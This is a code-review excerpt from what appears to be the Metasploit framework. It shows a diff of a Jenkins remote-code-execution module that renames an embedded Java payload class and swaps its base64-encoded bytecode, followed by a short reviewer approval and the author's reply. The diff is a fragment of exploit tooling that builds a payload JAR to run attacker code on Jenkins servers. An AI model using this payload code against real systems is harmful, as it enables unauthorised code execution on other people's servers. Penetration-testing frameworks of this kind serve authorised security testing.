modules/exploits/multi/http/jenkins_metaprogramming.rb

```diff
@@ -287,33 +283,32 @@ def payload_jar
     jar.pack
   end
 
-=begin javac Exploit.java
+=begin javac Metasploit.java
   import metasploit.Payload;
 
-  public class Exploit {
-      public Exploit(){
+  public class Metasploit {
+      public Metasploit(){
           try {
               Payload.main(null);
           } catch (Exception e) { }
 
       }
   }
 =end
-  def exploit_class
+  def constructor_class
     klass = Rex::Text.decode_base64(
       <<~EOF
-        yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB
-        AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq
-        YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl
-        Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n
-        L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q
-        twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL
-        AAAA
+        yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN
```

Comment:
This appears to be realignment of listing to be less compact and to flow across less lines. Approved.

Reply:
I think I actually changed the Base64 so the class name would be `Metasploit`. But it works. This module has been tested throughout my committing spree.